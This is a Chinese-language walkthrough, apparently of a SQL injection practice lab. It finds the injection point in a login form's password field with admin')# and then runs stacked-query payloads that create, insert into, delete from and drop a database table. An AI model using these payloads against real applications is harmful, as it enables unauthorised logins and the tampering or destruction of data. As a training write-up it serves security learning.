这一关有没有报错信息 所以我们不能从报错信息中得知注入类型 我们只能通过登陆成功或者失败去辨别我们判断的注入类型正确与否 然后我们也不懂注入点 所以只能进行尝试了 

如果两个参数在SQL语句中都被单引号包裹住

那么假设username为注入点输入如下

username admin'#
password admin

登陆失败

假设password为注入点输入如下

username admin
password admin'#

也是登录失败

然后如果两者再SQL语句中都是被('')包裹的话 

假设username为注入点的话 那么输入如下

username admin')#
password admin

登陆失败

假设password为注入点的话 那么输入如下

username admin
password admin')#

尝试到这 总算成功登陆了 说明注入点为password 注入类型为('')

接着开始创建一个表格 记得这一次不能再用admin作为注入的参数值 而是得替换成1 防止登陆成功

输入如下

1');create table demo like users;#

数据库的回显如下所示

接着往里面添加一条数据 输入如下

1');insert into demo values(1,'xiaozhao','888');#

数据库的回显如下所示

接着删除数据 输入如下

1');delete from demo where id=1;#

 数据库的回显如下所示

最后进行删除表格的操作 输入如下

1');drop table demo;#

 数据库的回显如下所示

大功告成 嗨嗨！！